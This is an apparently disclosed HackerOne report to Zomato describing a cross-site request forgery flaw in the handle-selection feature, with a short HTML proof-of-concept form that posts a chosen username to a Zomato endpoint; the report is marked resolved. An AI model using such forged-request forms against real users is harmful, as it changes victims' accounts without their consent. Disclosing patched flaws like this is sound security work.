CSRF AT SELECTING ZAMATO HANDLE

Disclosed: 2016-03-18 05:28:06 By kiraak-boy To zomato
Unknown
Vulnerability Details
Hello, Your Application Have Feature To Choose Zomato Handle POC:- <html> <body> <form action="https://www.zomato.com/php/username_selector.php" method="POST"> <input type="hidden" name="uname" value="googlessssssssssx" /> <input type="submit" value="Submit request" /> </form> </body> </html> Thanks!
Actions
View on HackerOne
Report Stats
  • Report ID: 113857
  • State: Closed
  • Substate: resolved
  • Upvotes: 4
Share this report